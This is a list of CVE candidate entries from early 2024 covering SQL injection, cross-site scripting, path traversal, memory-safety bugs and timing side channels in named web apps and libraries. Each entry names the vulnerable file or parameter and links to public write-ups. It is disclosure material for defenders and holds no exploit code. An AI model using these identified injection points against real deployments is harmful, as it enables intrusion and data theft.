CVE 2024 2527 Candidate A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/rooms.php. The manipulation of the argument room_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256964. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256964 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256964 | MISC:VDB-256964 | MAGESH-K21 Online-College-Event-Hall-Reservation-System rooms.php sql injection | URL:https://vuldb.com/?id.256964 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20rooms.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20rooms.php.md Assigned (20240315)
CVE 2024 25269 Candidate libheif <= 1.17.6 contains a memory leak in the function JpegEncoder::Encode. This flaw allows an attacker to cause a denial of service attack. MISC:https://github.com/strukturag/libheif/issues/1073 Assigned (20240207)
CVE 2024 25262 Candidate texlive-bin commit c515e was discovered to contain heap buffer overflow via the function ttfLoadHDMX:ttfdump. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted TTF file. MISC:https://bugs.launchpad.net/ubuntu/+source/texlive-bin/+bug/2047912 | MISC:https://tug.org/svn/texlive/trunk/Build/source/texk/ttfdump/ChangeLog?revision=69605&view=co Assigned (20240207)
CVE 2024 25260 Candidate elfutils v0.189 was discovered to contain a NULL pointer dereference via the handle_verdef() function at readelf.c. MISC:https://github.com/schsiung/fuzzer_issues/issues/1 | MISC:https://sourceware.org/bugzilla/show_bug.cgi?id=31058 | MISC:https://sourceware.org/elfutils/ Assigned (20240207)
CVE 2024 2526 Candidate A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/rooms.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256963. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256963 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256963 | MISC:VDB-256963 | MAGESH-K21 Online-College-Event-Hall-Reservation-System rooms.php cross site scripting | URL:https://vuldb.com/?id.256963 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20rooms.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20rooms.php.md Assigned (20240315)
CVE 2024 25251 Candidate code-projects Agro-School Management System 1.0 is suffers from Incorrect Access Control. MISC:https://code-projects.org/agro-school-management-system-in-php-with-source-code/ | MISC:https://github.com/ASR511-OO7/CVE-2024-25251/blob/main/CVE-17 Assigned (20240207)
CVE 2024 25250 Candidate SQL Injection vulnerability in code-projects Agro-School Management System 1.0 allows attackers to run arbitrary code via the Login page. MISC:https://github.com/ASR511-OO7/CVE-2024-25250./blob/main/CVE-38 Assigned (20240207)
CVE 2024 2525 Candidate A vulnerability, which was classified as problematic, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected is an unknown function of the file /admin/receipt.php. The manipulation of the argument id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256962 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256962 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256962 | MISC:VDB-256962 | MAGESH-K21 Online-College-Event-Hall-Reservation-System receipt.php cross site scripting | URL:https://vuldb.com/?id.256962 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20receipt.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20receipt.php.md Assigned (20240315)
CVE 2024 25249 Candidate An issue in He3 App for macOS version 2.0.17, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. MISC:https://github.com/intbjw | MISC:https://github.com/intbjw/CVE-2024-25249 | MISC:https://www.electronjs.org/blog/statement-run-as-node-cves Assigned (20240207)
CVE 2024 25248 Candidate SQL Injection vulnerability in the orderGoodsDelivery() function in Niushop B2B2C V5 allows attackers to run arbitrary SQL commands via the order_id parameter. MISC:https://harryha.substack.com/p/phuong-phap-phan-tich-ma-nguon-tim-lo-hong Assigned (20240207)
CVE 2024 25247 Candidate SQL Injection vulnerability in /app/api/controller/Store.php in Niushop B2B2C V5 allows attackers to run arbitrary SQL commands via latitude and longitude parameters. MISC:https://harryha.substack.com/p/phuong-phap-phan-tich-ma-nguon-tim-lo-hong Assigned (20240207)
CVE 2024 2524 Candidate A vulnerability, which was classified as critical, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This issue affects some unknown processing of the file /admin/receipt.php. The manipulation of the argument room_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256961 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256961 | MISC:VDB-256961 | MAGESH-K21 Online-College-Event-Hall-Reservation-System receipt.php sql injection | URL:https://vuldb.com/?id.256961 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20receipt.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20receipt.php.md Assigned (20240315)
CVE 2024 25239 Candidate SQL Injection vulnerability in Sourcecodester Employee Management System v1.0 allows attackers to run arbitrary SQL commands via crafted POST request to /emloyee_akpoly/Account/login.php. MISC:https://blu3ming.github.io/sourcecodester-employee-management-system-sql-injection/ Assigned (20240207)
CVE 2024 2523 Candidate A vulnerability classified as problematic was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This vulnerability affects unknown code of the file /admin/booktime.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256960. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256960 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256960 | MISC:VDB-256960 | MAGESH-K21 Online-College-Event-Hall-Reservation-System booktime.php cross site scripting | URL:https://vuldb.com/?id.256960 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20booktime.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20booktime.php.md Assigned (20240315)
CVE 2024 25228 Candidate Vinchin Backup and Recovery 7.2 and Earlier is vulnerable to Authenticated Remote Code Execution (RCE) via the getVerifydiyResult function in ManoeuvreHandler.class.php. FULLDISC:20240313 [Full Disclosure] CVE-2024-25228: Unpatched Command Injection in Vinchin Backup & Recovery Versions 7.2 and Earlier | URL:https://seclists.org/fulldisclosure/2024/Mar/15 | MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/ Assigned (20240207)
CVE 2024 25227 Candidate SQL Injection vulnerability in ABO.CMS version 5.8, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via the tb_login parameter in admin login page. MISC:https://thetrueartist.wixsite.com/cveblog/post/understanding-the-potential-impact-of-cve-2024-25227-what-you-need-to-know-and-how-it-was-discovered Assigned (20240207)
CVE 2024 25226 Candidate A cross-site scripting (XSS) vulnerability in Simple Admin Panel App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Category Name parameter under the Add Category function. MISC:https://github.com/BurakSevben/CVEs/blob/main/Supplier%20Managment%20System/Supplier%20Managment%20System%20-%20SQL%20Injection.md Assigned (20240207)
CVE 2024 25224 Candidate A cross-site scripting (XSS) vulnerability in Simple Admin Panel App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Size Number parameter under the Add Size function. MISC:https://github.com/BurakSevben/CVEs/blob/main/Simple%20Admin%20Panel%20App/Simple%20Admin%20Panel%20App%20-%20Cross-Site-Scripting%20-%202.md Assigned (20240207)
CVE 2024 25223 Candidate Simple Admin Panel App v1.0 was discovered to contain a SQL injection vulnerability via the orderID parameter at /adminView/viewEachOrder.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Simple%20Admin%20Panel%20App/Simple%20Admin%20Panel%20App%20-%20SQL%20Injection.md Assigned (20240207)
CVE 2024 25222 Candidate Task Manager App v1.0 was discovered to contain a SQL injection vulnerability via the projectID parameter at /TaskManager/EditProject.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Task%20Manager%20App/Task%20Manager%20App%20-%20SQL%20Injection%20-%201.md Assigned (20240207)
CVE 2024 25221 Candidate A cross-site scripting (XSS) vulnerability in Task Manager App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note Section parameter at /TaskManager/Tasks.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Task%20Manager%20App/Task%20Manager%20App%20-%20Cross-Site-Scripting%20-3.md Assigned (20240207)
CVE 2024 25220 Candidate Task Manager App v1.0 was discovered to contain a SQL injection vulnerability via the taskID parameter at /TaskManager/EditTask.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Task%20Manager%20App/Task%20Manager%20App%20-%20SQL%20Injection%20-%202.md Assigned (20240207)
CVE 2024 2522 Candidate A vulnerability classified as critical has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file /admin/booktime.php. The manipulation of the argument room_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256959. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256959 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256959 | MISC:VDB-256959 | MAGESH-K21 Online-College-Event-Hall-Reservation-System booktime.php sql injection | URL:https://vuldb.com/?id.256959 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20booktime.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20booktime.php.md Assigned (20240315)
CVE 2024 25219 Candidate A cross-site scripting (XSS) vulnerability in Task Manager App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Task Name parameter /TaskManager/Task.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Task%20Manager%20App/Task%20Manager%20App%20-%20Cross-Site-Scripting%20-%202.md Assigned (20240207)
CVE 2024 25218 Candidate A cross-site scripting (XSS) vulnerability in Task Manager App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Project Name parameter /TaskManager/Projects.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Task%20Manager%20App/Task%20Manager%20App%20-%20Cross-Site-Scripting%20-1.md Assigned (20240207)
CVE 2024 25217 Candidate Online Medicine Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /omos/?p=products/view_product. MISC:https://github.com/BurakSevben/CVEs/blob/main/Online%20Medicine%20Ordering%20System/OMOS%20-%20SQL%20Injection(Unauthenticated).md Assigned (20240207)
CVE 2024 25216 Candidate Employee Managment System v1.0 was discovered to contain a SQL injection vulnerability via the mailud parameter at /aprocess.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Employee%20Management%20System/Employee%20Managment%20System%20-%20SQL%20Injection%20-%201.md Assigned (20240207)
CVE 2024 25215 Candidate Employee Managment System v1.0 was discovered to contain a SQL injection vulnerability via the pwd parameter at /aprocess.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Employee%20Management%20System/Employee%20Managment%20System%20-%20SQL%20Injection%20-%202.md Assigned (20240207)
CVE 2024 25214 Candidate An issue in Employee Managment System v1.0 allows attackers to bypass authentication via injecting a crafted payload into the E-mail and Password parameters at /alogin.html. MISC:https://github.com/BurakSevben/CVEs/blob/main/Employee%20Management%20System/Employee%20Managment%20System%20-%20Authentication%20Bypass.md Assigned (20240207)
CVE 2024 25213 Candidate Employee Managment System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /edit.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Employee%20Management%20System/Employee%20Managment%20System%20-%20SQL%20Injection%20-%203.md Assigned (20240207)
CVE 2024 25212 Candidate Employee Managment System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /delete.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Employee%20Management%20System/Employee%20Managment%20System%20-%20SQL%20Injection%20-%204.md Assigned (20240207)
CVE 2024 25211 Candidate Simple Expense Tracker v1.0 was discovered to contain a SQL injection vulnerability via the category parameter at /endpoint/delete_category.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Simple%20Expense%20Tracker/Simple%20Expense%20Tracker%20-%20SQL%20Injection-2.md Assigned (20240207)
CVE 2024 25210 Candidate Simple Expense Tracker v1.0 was discovered to contain a SQL injection vulnerability via the expense parameter at /endpoint/delete_expense.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Simple%20Expense%20Tracker/Simple%20Expense%20Tacker%20-%20SQL%20Injection-1.md Assigned (20240207)
CVE 2024 2521 Candidate A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/bookdate.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256958 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256958 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256958 | MISC:VDB-256958 | MAGESH-K21 Online-College-Event-Hall-Reservation-System bookdate.php cross site scripting | URL:https://vuldb.com/?id.256958 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20bookdate.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20bookdate.php.md Assigned (20240315)
CVE 2024 25209 Candidate Barangay Population Monitoring System 1.0 was discovered to contain a SQL injection vulnerability via the resident parameter at /endpoint/delete-resident.php. MISC:https://github.com/BurakSevben/CVEs/blob/main/Barangay%20Population%20Monitoring%20System/Barangay%20Population%20System%20-%20SQL%20Injection.md Assigned (20240207)
CVE 2024 25208 Candidate Barangay Population Monitoring System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the Add Resident function at /barangay-population-monitoring-system/masterlist.php. This vulnerabiity allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Full Name parameter. MISC:https://github.com/BurakSevben/CVEs/blob/main/Barangay%20Population%20Monitoring%20System/Barangay%20Population%20System%20-%20XSS-1.md Assigned (20240207)
CVE 2024 25207 Candidate Barangay Population Monitoring System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the Add Resident function at /barangay-population-monitoring-system/masterlist.php. This vulnerabiity allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Contact Number parameter. MISC:https://github.com/BurakSevben/CVEs/blob/main/Barangay%20Population%20Monitoring%20System/Barangay%20Population%20System%20-%20XSS-2.md Assigned (20240207)
CVE 2024 25202 Candidate Cross Site Scripting vulnerability in Phpgurukul User Registration & Login and User Management System 1.0 allows attackers to run arbitrary code via the search bar. MISC:https://drive.google.com/file/d/1oMNcChsXPMP9pu9lIE2C11n8mzkmLhcY/view | MISC:https://github.com/Agampreet-Singh/CVE-2024-25202 | MISC:https://medium.com/@agampreetsingh_93704/cve-2024-25202-discover-by-agampreet-singh-cyber-security-expert-ff8e32f5cf52 Assigned (20240207)
CVE 2024 25201 Candidate Espruino 2v20 (commit fcc9ba4) was discovered to contain an Out-of-bounds Read via jsvStringIteratorPrintfCallback at src/jsvar.c. MISC:https://github.com/espruino/Espruino/issues/2456 Assigned (20240207)
CVE 2024 25200 Candidate Espruino 2v20 (commit fcc9ba4) was discovered to contain a Stack Overflow via the jspeFactorFunctionCall at src/jsparse.c. MISC:https://github.com/espruino/Espruino/issues/2457 Assigned (20240207)
CVE 2024 2520 Candidate A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/bookdate.php. The manipulation of the argument room_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256957 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256957 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256957 | MISC:VDB-256957 | MAGESH-K21 Online-College-Event-Hall-Reservation-System bookdate.php sql injection | URL:https://vuldb.com/?id.256957 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20bookdate.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20bookdate.php.md Assigned (20240315)
CVE 2024 25199 Candidate Inappropriate pointer order of map_sub_ and map_free(map_) (amcl_node.cpp) in Open Robotics Robotic Operating Sytstem 2 (ROS2) and Nav2 humble versions leads to a use-after-free. MISC:https://github.com/ros-planning/navigation2/blob/main/nav2_amcl/src/amcl_node.cpp#L331-L344 | MISC:https://github.com/ros-planning/navigation2/pull/4078 | MISC:https://github.com/ros-planning/navigation2/pull/4079 Assigned (20240207)
CVE 2024 25198 Candidate Inappropriate pointer order of laser_scan_filter_.reset() and tf_listener_.reset() (amcl_node.cpp) in Open Robotics Robotic Operating Sytstem 2 (ROS2) and Nav2 humble versions leads to a use-after-free. MISC:https://github.com/ros-planning/navigation2/blob/main/nav2_amcl/src/amcl_node.cpp#L331-L344 | MISC:https://github.com/ros-planning/navigation2/pull/4068 | MISC:https://github.com/ros-planning/navigation2/pull/4070 Assigned (20240207)
CVE 2024 25197 Candidate Open Robotics Robotic Operating Sytstem 2 (ROS2) and Nav2 humble versions were discovered to contain a NULL pointer dereference via the isCurrent() function at /src/layered_costmap.cpp. MISC:https://github.com/ros-planning/navigation2/issues/3940 | MISC:https://github.com/ros-planning/navigation2/issues/3958 | MISC:https://github.com/ros-planning/navigation2/issues/3971 | MISC:https://github.com/ros-planning/navigation2/issues/3972 Assigned (20240207)
CVE 2024 25196 Candidate Open Robotics Robotic Operating Sytstem 2 (ROS2) and Nav2 humble versions were discovered to contain a buffer overflow via the nav2_controller process. This vulnerability is triggerd via sending a crafted .yaml file. MISC:https://github.com/ros-planning/navigation2/issues/4005 | MISC:https://github.com/ros-planning/navigation2/pull/4017 | MISC:https://robotics.stackexchange.com/questions/106008/ros2nav2user-misconfiguration-of-parameters-may-cause-instantaneous-crashs Assigned (20240207)
CVE 2024 25191 Candidate php-jwt 1.0.0 uses strcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel. MISC:https://github.com/P3ngu1nW/CVE_Request/blob/main/cdoco%3Aphp-jwt.md Assigned (20240207)
CVE 2024 25190 Candidate l8w8jwt 2.2.1 uses memcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel. MISC:https://github.com/P3ngu1nW/CVE_Request/blob/main/GlitchedPolygons%3Al8w8jwt.md Assigned (20240207)
CVE 2024 2519 Candidate A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been classified as problematic. Affected is an unknown function of the file navbar.php. The manipulation of the argument id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256956. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256956 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256956 | MISC:VDB-256956 | MAGESH-K21 Online-College-Event-Hall-Reservation-System navbar.php cross site scripting | URL:https://vuldb.com/?id.256956 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20navbar.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20navbar.php.md Assigned (20240315)
CVE 2024 25189 Candidate libjwt 1.15.3 uses strcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel. MISC:https://github.com/P3ngu1nW/CVE_Request/blob/main/benmcollins%3Alibjwt.md | MLIST:[debian-lts-announce] 20240225 [SECURITY] [DLA 3739-1] libjwt security update | URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00009.html Assigned (20240207)
CVE 2024 25180 Candidate An issue discovered in pdfmake 0.2.9 allows remote attackers to run arbitrary code via crafted POST request to the path '/pdf'. MISC:https://github.com/joaoviictorti/My-CVES/blob/main/CVE-2024-25180/README.md Assigned (20240207)
CVE 2024 2518 Candidate A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. This issue affects some unknown processing of the file book_history.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256955. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256955 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256955 | MISC:VDB-256955 | MAGESH-K21 Online-College-Event-Hall-Reservation-System book_history.php cross site scripting | URL:https://vuldb.com/?id.256955 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20book_history.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20book_history.php.md Assigned (20240315)
CVE 2024 25175 Candidate An issue in Kickdler before v1.107.0 allows attackers to provide an XSS payload via a HTTP response splitting attack. MISC:https://github.com/jet-pentest/CVE-2024-25175 | MISC:https://www.kickidler.com/ Assigned (20240207)
CVE 2024 25170 Candidate An issue in Mezzanine v6.0.0 allows attackers to bypass access controls via manipulating the Host header. MISC:https://github.com/shenhav12/CVE-2024-25170-Mezzanine-v6.0.0 | MISC:https://ibb.co/DpxHpz9 | MISC:https://ibb.co/T0fhLwR Assigned (20240207)
CVE 2024 2517 Candidate A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as critical. This vulnerability affects unknown code of the file book_history.php. The manipulation of the argument del_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256954 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256954 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256954 | MISC:VDB-256954 | MAGESH-K21 Online-College-Event-Hall-Reservation-System book_history.php sql injection | URL:https://vuldb.com/?id.256954 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Blind%20SQL%20Injection%20-%20book_history.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Blind%20SQL%20Injection%20-%20book_history.php.md Assigned (20240315)
CVE 2024 25169 Candidate An issue in Mezzanine v6.0.0 allows attackers to bypass access control mechanisms in the admin panel via a crafted request. MISC:https://github.com/shenhav12/CVE-2024-25169-Mezzanine-v6.0.0 | MISC:https://ibb.co/JKh4hmD | MISC:https://ibb.co/Pt9qd8t | MISC:https://ibb.co/hLLPTVp | MISC:https://ibb.co/rfrKj3r Assigned (20240207)
CVE 2024 25168 Candidate SQL injection vulnerability in snow snow v.2.0.0 allows a remote attacker to execute arbitrary code via the dataScope parameter of the system/role/list interface. MISC:https://github.com/biantaibao/snow_SQL/blob/main/report.md Assigned (20240207)
CVE 2024 25167 Candidate Cross Site Scripting vulnerability in eblog v1.0 allows a remote attacker to execute arbitrary code via a crafted script to the argument description parameter when submitting a comment on a post. MISC:https://github.com/biantaibao/eblog_xss/blob/main/report.md Assigned (20240207)
CVE 2024 25166 Candidate Cross Site Scripting vulnerability in 71CMS v.1.0.0 allows a remote attacker to execute arbitrary code via the uploadfile action parameter in the controller.php file. MISC:https://github.com/xiaocheng-keji/71cms/issues/1 Assigned (20240207)
CVE 2024 25165 Candidate A global-buffer-overflow vulnerability was found in SWFTools v0.9.2, in the function LineText at lib/swf5compiler.flex. MISC:https://github.com/matthiaskramm/swftools/issues/217 Assigned (20240207)
CVE 2024 25164 Candidate iA Path Traversal vulnerability exists in iDURAR v2.0.0, that allows unauthenticated attackers to expose sensitive files via the download functionality. MISC:https://github.com/idurar/idurar-erp-crm/tree/2.0.0/routes/erpRoutes/erpDownloadRouter.js | MISC:https://github.com/u32i/cve/tree/main/CVE-2024-25164 Assigned (20240207)
CVE 2024 2516 Candidate A vulnerability, which was classified as critical, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file home.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256953 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256953 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256953 | MISC:VDB-256953 | MAGESH-K21 Online-College-Event-Hall-Reservation-System home.php sql injection | URL:https://vuldb.com/?id.256953 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Blind%20SQL%20Injection%20-%20home.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Blind%20SQL%20Injection%20-%20home.php.md Assigned (20240315)
CVE 2024 25156 Candidate A path traversal vulnerability exists in GoAnywhere MFT prior to 7.4.2 which allows attackers to circumvent endpoint-specific permission checks in the GoAnywhere Admin and Web Clients. MISC:https://www.fortra.com/security/advisory/fi-2024-004 | URL:https://www.fortra.com/security/advisory/fi-2024-004 Assigned (20240206)
CVE 2024 25155 Candidate In FileCatalyst Direct 3.8.8 and earlier through 3.8.6, the web server does not properly sanitize illegal characters in a URL which is then displayed on a subsequent error page. A malicious actor could craft a URL which would then execute arbitrary code within an HTML script tag. MISC:https://filecatalyst.software/public/filecatalyst/Direct/3.8.9.90/whatsnew_direct.html | URL:https://filecatalyst.software/public/filecatalyst/Direct/3.8.9.90/whatsnew_direct.html | MISC:https://www.fortra.com/security/advisory/fi-2024-003 | URL:https://www.fortra.com/security/advisory/fi-2024-003 Assigned (20240206)
CVE 2024 25154 Candidate Improper URL validation leads to path traversal in FileCatalyst Direct 3.8.8 and earlier allowing an encoded payload to cause the web server to return files located outside of the web root which may lead to data leakage. MISC:https://filecatalyst.software/public/filecatalyst/Direct/3.8.9.90/whatsnew_direct.html | URL:https://filecatalyst.software/public/filecatalyst/Direct/3.8.9.90/whatsnew_direct.html | MISC:https://www.fortra.com/security/advisory/fi-2024-003 | URL:https://www.fortra.com/security/advisory/fi-2024-003 Assigned (20240206)
CVE 2024 25153 Candidate A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells. MISC:https://filecatalyst.software/public/filecatalyst/Workflow/5.1.6.114/fcweb_releasenotes.html | URL:https://filecatalyst.software/public/filecatalyst/Workflow/5.1.6.114/fcweb_releasenotes.html | MISC:https://www.fortra.com/security/advisory/fi-2024-002 | URL:https://www.fortra.com/security/advisory/fi-2024-002 Assigned (20240206)
